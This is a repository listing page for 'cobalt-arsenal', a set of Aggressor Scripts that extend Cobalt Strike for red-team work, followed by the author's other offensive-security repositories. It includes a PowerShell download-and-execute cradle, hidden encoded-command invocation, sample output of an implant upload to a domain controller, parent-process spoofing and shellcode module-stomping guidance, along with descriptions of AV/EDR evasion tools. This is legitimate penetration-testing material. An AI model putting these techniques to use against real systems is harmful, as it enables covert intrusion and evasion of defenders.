• Stars
    star
    1,033
  • Rank 44,608 (Top 0.9 %)
  • Language
    PowerShell
  • License
    MIT License
  • Created over 4 years ago
  • Updated over 1 year ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

My collection of battle-tested Aggressor Scripts for Cobalt Strike 4.0+

cobalt-arsenal

My published set of Aggressor Scripts for Cobalt Strike 4.0+

  • Beacon_Initial_Tasks.cna - This script lets you configure commands that should be launched as soon as the Beacon checks-in for the first time. Both commands and argue settings are available in a dedicated options dialog. Also, a feature to right-click on a Beacon and issue "Run custom command..." was added to allow to run arbitrary commands against multiple beacons. Settings are then save in file specified in a global variable named: $beaconInitialTasksSettingsFile

    How it works?

    Implementation of beacon_task() functionality to invoke nearly-arbitrary Cobalt Strike commands from a passed string, from within your Aggressor scripts: beacon_task($bid, "execute-assembly C:\\tools\\Rubeus.exe hash /password:test");

  • better-upload.cna - Simple yet super handy script that overrides built-in upload command by having one that offers additional, second parameter - being remote file path. By default we're only able to upload file to the CWD. This implementation let's us upload wherever we like. Additionally, it computes and prints out the MD5 checksum of every uploaded file for facilitating IOCs tracing:

beacon> upload implant.exe \\DC1\c$\windows\temp\implant.exe
[*] Tasked Beacon to upload file (size: 929.25KB, md5: 6465bb8a4af8dd2d93f8f386a16be341) from: (implant.exe) to: (\\DC1\c$\windows\temp\implant.exe)
[+] host called home, sent: 951655 bytes

  • cwd-in-beacon-status-bar.cna - Simple Beacon console status bar enhancement showing Beacon's last known current working directory path, as well as adding fixed-width to last-seen meter. Additionally, this script enhances cd command to make it restore previous path if cd - was issued (and previous path is known).

  • custom-powershell-hooks.cna - This script introduces several different methods for Powershell download and execution primitives, other than Cobalt Strike's default (Net.WebClient).DownloadString and IEX():

		set POWERSHELL_DOWNLOAD_CRADLE {
			return "IEX (New-Object Net.Webclient).DownloadString(' $+ $1 $+ ')";
		}
		[...]

		set POWERSHELL_COMMAND {
		[...]
			return "powershell -nop -w hidden -encodedcommand $script";
		}

Aforementioned methods are heavily flagged these days by EDRs and AVs so we would prefer to avoid their use. It so happens that Cobalt Strike by default embeds them excessively, generating lot of noise in such systems. We can tell Cobalt Strike to structure it's Powershell use patterns differently. However, some of introduced custom methods may not work. In such situations, we can always switch back to battle tested Cobalt Strike defaults by setting $USE_UNSAFE_ENCODEDCOMMAND_AND_IEX = 2; in the script's header.

  • FilesColor.cna - Color Coded Files Listing. Similar to ProcessColor.cna by @r3dQu1nn this script colorizes file listing outputs based on file type and extension. It also tries to keep track of uploaded files to have them highlighted in files listing as well. The Colors scheme information will be showed only three times by default, unless configured otherwise via global variable named $TIMES_TO_DISPLAY_COLORS_SCHEME.

FilesColor example

  • Forwarded_Ports.cna - Keeps track of configured remote port forwardings on all Beacons and lets kill them easily. Available in View -> Remote Forwarded Ports

    Using rportfwd here and there quickly consumes pool of available local ports from which to forward traffic outbound and keeping track of them manually becomes tedious on a long-haul projects. This script aims to fill that gap by collecting these commands and presenting them in a nice visualization pane (concept & implementation based on previous work of @ramen0x3f leave_no_trace, @001SPARTaN and @r3dqu1nn logvis.cna ).

  • hash.cna - Implementation of MD5/SHA1/SHA256 hashing routines in aggressor script.

  • Highlight_Beacons.cna - Highlights Beacons for a specified time duration ($HIGHLIGHT_DURATION) on Initial check-in event, when exiting (and after Beacon exited) and after each Beacon command's output. Configurable colors and events found in %HIGHLIGHTS dictionary. Hint: Specify output => "" to disable highlighting new Beacon command outputs.

  • httprequest.cna - Safe & sound HTTP request implementation for Cobalt Strike 4.0 Aggressor Script. Works with HTTP & HTTPS, GET/POST/etc. + redirections. Rationale: I've tested various implementations of HTTP request sending subroutines written in Sleep for CS, but none of them matched by needs - working support for GET/POST, redirections handling and exceptions-safe execution. So I came up with my own implementation. (gist)

  • mgeekys_arsenal.cna - 3300+ kLOC stuffed with Cobalt Strike goodies, improvements, enhancements and aliases making workflow with Cobalt way much easier and nicer! This script combines most of the utilities placed in this repository:

    • Current working directory on status bar
    • Beacon initial actions
    • Better upload
    • handy aliases around most commonly used tools
    • super handy execute-assembly not requiring full path to the executable
    • auto Parent PID spoofing logic
    • and plenty more toys worth checking out!

    Arsenal window

  • Payload_Variants_Generator.cna - This script generates stageless payload variants per each available architecture and output format type. Compatible with Cobalt Strike 4.0+.

  • parse-error-codes.cna - A handy script that parses reported error codes and prints their corresponding Windows related meaning directly in Beacon's console output.

    From:

    beacon> ls C:\gdgsdfgdf
    [-] could not open C:\gdgsdfgdf\*: 3
    

    To:

    beacon> ls C:\gdgsdfgdf
    [-] could not open C:\gdgsdfgdf\*: 3. Parsed error code:
        3 - ERROR_PATH_NOT_FOUND
    

    Also, the script exposes useful get-error <number> alias to quickly determine error's explanation based on supplied number:

    beacon> get-error 5
    [*] Parsed error code:
      5 - ERROR_ACCESS_DENIED
    
  • rename-beacon-tabs.cna - Script that lets us rename Beacon-related tabs from a default format of: Beacon <ip>@<pid> to anything other we like, for instance: B: <user>@<computer> (<pid>).

    Format deciding how should each Beacon's tab be named, utilising beacon's metadata fields is described in a global variable named $beacon_tab_name_format . That variable may contain any of the following available beacon's metadata keys (CobaltStrike 4.2):

    note, charset, internal , alive, session, listener, pid, lastf, computer, host, is64, id, process, ver, last, os, barch, phint, external, port, build, pbid, arch, user, _accent

  • settings.cna - Script that offers sample implementation for saveOptions and loadOptions routines, intended to store & restore settings from an external file.

  • smart-autoppid.cna - Autoppid - script that smartely invokes PPID for every new checkin in Beacon. PPID command requires invoked Beacon to have the same Integrity level as the process it want's to assume as it's Parent. That's due to how InitializeProcThreadAttributeList with PROC_THREAD_ATTRIBUTE_PARENT_PROCESS works. In order to avoid harcoded explorer.exe PID assumption, we can look around for a configurable process name and then try to find that process running on the highest available for us integrity level. In that case, unprivileged user would assume PPID of for instance svchost.exe running as that user, wherease the privileged one - could go for the svchost.exe running as NT AUTHORITY\SYSTEM. We aim to smartely pick the most advantageous target, in a dynamic fashion.

The same command is also exposed as an alias:

beacon> autoppid
[*] Tasked Beacon to find svchost.exe running as SYSTEM and make it the PPID.
[.] host called home, sent: 12 bytes
Future post-ex jobs will be spawned with fake PPID set to:
	svchost.exe	604	700	x64	NT AUTHORITY\SYSTEM	0

[*] Tasked beacon to spoof 700 as parent process
[.] host called home, sent: 12 bytes
  • stomp-dll-info.py - A script that list DLL files properties for purpose of finding good Module Stomping candidates. The results of this script can then be used in Cobalt Strike Malleable C2 Profiles and for the sake of other shellcode process-injection tests. Especially useful while setting module_x86 and module_x64 fields in your Malleable C2 Profiles.

Help:

PS C:\> py .\stomp-dll-info.py --help

    :: stomp-dll-info.py - Your Module Stomping / DLL Hollowing candidates headhunter!
    A script that scans, filters, analyzes DLL files displaying viable candidates for module stomping.

    Mariusz Banach / mgeeky, '21
    <mb [at] binary-offensive.com>

usage: .\stomp-dll-info.py [options] <path>

positional arguments:
  path                  Path to a DLL/directory.

optional arguments:
  -h, --help            show this help message and exit
  -r, --recurse         If <path> is a directory, perform recursive scan.
  -v, --verbose         Verbose mode.

Output sorting:
  -a, --ascending       Sort in ascending order instead of default of descending.
  -c COLUMN, --column COLUMN
                        Sort by this column name. Default: filename. Available columns: "type", "filename", "file size", "image size", "code size", "hollow size", ".NET", "signed", "in System32", "in SysWOW64", "used by", "path"
  -n NUM, --first NUM   Show only first N results, as specified in this paremeter. By default will show all candidates.

Output filtering:
  -C CODESIZE, --min-code-size CODESIZE
                        Show only modules with code section bigger than this value.
  -I IMAGESIZE, --min-image-size IMAGESIZE
                        Show only modules which images are bigger than this value.
  -E HOLLOWSIZE, --hollow-size HOLLOWSIZE
                        Show only modules with enough room to fit shellcode in Module Stomping / DLL Hollowing technique. Example Beacon size requirement: 300KB (307200).
  -S SIZE, --min-file-size SIZE
                        Show only modules of size bigger than this value. Cobalt Strike c2lint complains when module stomping target is smaller than 23MB (24117248).
  -P NAME, --process NAME
                        Show only modules that are used by this process.
  -U, --used            Show only modules that are used by any process in the system.
  -Q, --not-used        Show only modules that are NOT used by any process in the system.
  -D, --dotnet          Show only modules that are .NET assemblies.
  -G, --signed          Show only code signed modules.
  -H, --unsigned        Show only unsigned modules.
  -W, --system-cross-arch
                        Show only modules that are present in both System32 and SysWOW64 directories.

Example usage:

PS C:\> py stomp-dll-info.py C:\Windows\System32 -c 'hollow size' -W -E 307200 -n 20

    :: stomp-dll-info.py - Your Module Stomping / DLL Hollowing candidates headhunter!
    A script that scans, filters, analyzes DLL files displaying viable candidates for module stomping.

    Mariusz Banach / mgeeky, '21
    <mb [at] binary-offensive.com>

+----+------+----------------------------------------+-----------+------------+-----------+---------------+-------+-----------------------+-------------+-------------+------------------------------------------+------------------------------------------+
| #  | type |                filename                | file size | image size | code size | â–¼ hollow size | .NET  |        signed         | in System32 | in SysWOW64 |                 used by                  |                   path                   |
+----+------+----------------------------------------+-----------+------------+-----------+---------------+-------+-----------------------+-------------+-------------+------------------------------------------+------------------------------------------+
| 0  | dll  |               mshtml.dll               | 23447040  |  23552000  | 16574643  |   14951811    | False |       Unsigned        |    True     |    True     |                                          |      C:\Windows\System32\mshtml.dll      |
| 1  | dll  |              edgehtml.dll              | 26269184  |  26406912  | 18349083  |   12778123    | False |       Unsigned        |    True     |    True     |              SearchApp.exe               |     C:\Windows\System32\edgehtml.dll     |
| 2  | dll  |          Windows.UI.Xaml.dll           | 17539584  |  17567744  | 12105148  |    8655164    | False |       Unsigned        |    True     |    True     |  SystemSettings.exe, TextInputHost.exe,  | C:\Windows\System32\Windows.UI.Xaml.dll  |
|    |      |                                        |           |            |           |               |       |                       |             |             |      explorer.exe, Calculator.exe,       |                                          |
|    |      |                                        |           |            |           |               |       |                       |             |             |      SearchApp.exe, onenoteim.exe,       |                                          |
|    |      |                                        |           |            |           |               |       |                       |             |             |       StartMenuExperienceHost.exe,       |                                          |
|    |      |                                        |           |            |           |               |       |                       |             |             |  Video.UI.exe, ShellExperienceHost.exe,  |                                          |
|    |      |                                        |           |            |           |               |       |                       |             |             |           WindowsTerminal.exe,           |                                          |
|    |      |                                        |           |            |           |               |       |                       |             |             |    Microsoft.Photos.exe, LockApp.exe,    |                                          |
|    |      |                                        |           |            |           |               |       |                       |             |             |              YourPhone.exe               |                                          |
| 3  | dll  |                wmp.dll                 | 11500544  |  11587584  |  8181400  |    6644984    | False |       Unsigned        |    True     |    True     |                                          |       C:\Windows\System32\wmp.dll        |
| 4  | dll  | Windows.Media.Protection.PlayReady.dll | 10352400  |  10309632  |  7175422  |    6218542    | False | Microsoft Corporation |    True     |    True     |                                          | C:\Windows\System32\Windows.Media.Protec |

[...]

☕ Show Support ☕

This and other projects are outcome of sleepless nights and plenty of hard work. If you like what I do and appreciate that I always give back to the community, Consider buying me a coffee (or better a beer) just to say thank you! 💪


Mariusz Banach / mgeeky, (@mariuszbit)
<mb [at] binary-offensive.com>

More Repositories

1

Penetration-Testing-Tools

A collection of more than 170+ tools, scripts, cheatsheets and other loots that I've developed over years for Red Teaming/Pentesting/IT Security audits purposes.
PowerShell
2,514
star
2

ThreadStackSpoofer

Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.
C++
1,035
star
3

RedWarden

Cobalt Strike C2 Reverse proxy that fends off Blue Teams, AVs, EDRs, scanners through packet inspection and malleable profile correlation
Python
922
star
4

ShellcodeFluctuation

An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then encrypting/decrypting its contents
C++
922
star
5

ProtectMyTooling

Multi-Packer wrapper letting us daisy-chain various packers, obfuscators and other Red Team oriented weaponry. Featured with artifacts watermarking, IOCs collection & PE Backdooring. You feed it with your implant, it does a lot of sneaky things and spits out obfuscated executable.
PowerShell
869
star
6

PackMyPayload

A PoC that packages payloads into output containers to evade Mark-of-the-Web flag & demonstrate risks associated with container file formats. Supports: ZIP, 7zip, PDF, ISO, IMG, CAB, VHD, VHDX
Python
853
star
7

decode-spam-headers

A script that helps you understand why your E-Mail ended up in Spam
Python
558
star
8

Stracciatella

OpSec-safe Powershell runspace from within C# (aka SharpPick) with AMSI, Constrained Language Mode and Script Block Logging disabled at startup
C#
494
star
9

ElusiveMice

Cobalt Strike User-Defined Reflective Loader with AV/EDR Evasion in mind
C
417
star
10

tomcatWarDeployer

Apache Tomcat auto WAR deployment & pwning penetration testing tool.
Python
409
star
11

UnhookMe

UnhookMe is an universal Windows API resolver & unhooker addressing problem of invoking unmonitored system calls from within of your Red Teams malware
C++
341
star
12

SharpWebServer

Red Team oriented C# Simple HTTP & WebDAV Server with Net-NTLM hashes capture functionality
C#
279
star
13

AzureRT

AzureRT - A Powershell module implementing various Azure Red Team tactics
PowerShell
227
star
14

expdevBadChars

Bad Characters highlighter for exploit development purposes supporting multiple input formats while comparing.
Python
202
star
15

msidump

MSI Dump - a tool that analyzes malicious MSI installation packages, extracts files, streams, binary data and incorporates YARA scanner.
Python
191
star
16

RobustPentestMacro

This is a rich-featured Visual Basic macro code for use during Penetration Testing assignments, implementing various advanced post-exploitation techniques.
VBScript
144
star
17

Exploit-Development-Tools

A bunch of my exploit development helper tools, collected in one place.
Python
140
star
18

VisualBasicObfuscator

Visual Basic Code universal Obfuscator intended to be used during penetration testing assignments.
Python
135
star
19

msi-shenanigans

Proof of Concept code and samples presenting emerging threat of MSI installer files.
Python
77
star
20

PE-library

Lightweight Portable Executable parsing library and a demo peParser application.
C++
72
star
21

HEVD_Kernel_Exploit

Exploits pack for the Windows Kernel mode driver HackSysExtremeVulnerableDriver written for educational purposes.
C++
63
star
22

procmon-filters

SysInternals' Process Monitor filters repository - collected from various places and made up by myself. To be used for quick Behavioral analysis of testing specimens. Inspired and based on Lenny Zeltser's collection.
58
star
23

PhishingPost

PHP Script intdended to be used during Phishing campaigns as a credentials collector linked to backdoored HTML <form> action parameter
PHP
56
star
24

burpContextAwareFuzzer

BurpSuite's payload-generation extension aiming at applying fuzzed test-cases depending on the type of payload (integer, string, path; JSON; XML; GWT; binary) and following encoding-scheme applied originally.
Python
39
star
25

CustomXMLPart

A PoC weaponising CustomXMLPart for hiding malware code inside of Office document structures.
VBA
37
star
26

dirbuster

wfuzz, SecLists and john -based dirbusting / forceful browsing script intended to be used during web pentest assingments
Shell
34
star
27

ntfs-journal-viewer

Utterly simple NTFS Journal dumping utility. Handy when it comes to Computer Forensics and Malware Forensics Ops.
C
33
star
28

digitalocean-app-redirector

Reverse-HTTP Redirector via DigitalOcean Apps Platform
Python
27
star
29

LISET

Light System Examination Toolkit (LISET) - logs & activity & configuration gathering utility that comes handy in fast Windows incident response (either forensic or malware oriented).
Batchfile
27
star
30

RPISEC-MBE-Solutions

Solutions to the RPISEC MBE / Modern Binary Exploitation VM & course.
Python
19
star
31

prc_xchk

User-mode process cross-checking utility intended to detect naive malware hiding itself by hooking IAT/EAT.
C++
17
star
32

PEInfo

Another Portable Executable files analysing stuff
C++
17
star
33

mgeeky

9
star
34

stegano1

College project implementing some of the compression and image steganographic algorithms.
C++
5
star
35

DISASM

Simple disassembling library (currently only x86)
C++
4
star
36

linux-utils

Some linux utils I've coded and decided to share.
C
2
star
37

Symulacja-Reaktora-Jadrowego

(Polish only) Program przygotowywany na uczelnie w ramach kursu "Symulacje Komputerowe". Przedstawia hipotetyczna prace reaktora jadrowego w roznych stanach i konfiguracjach.
MATLAB
1
star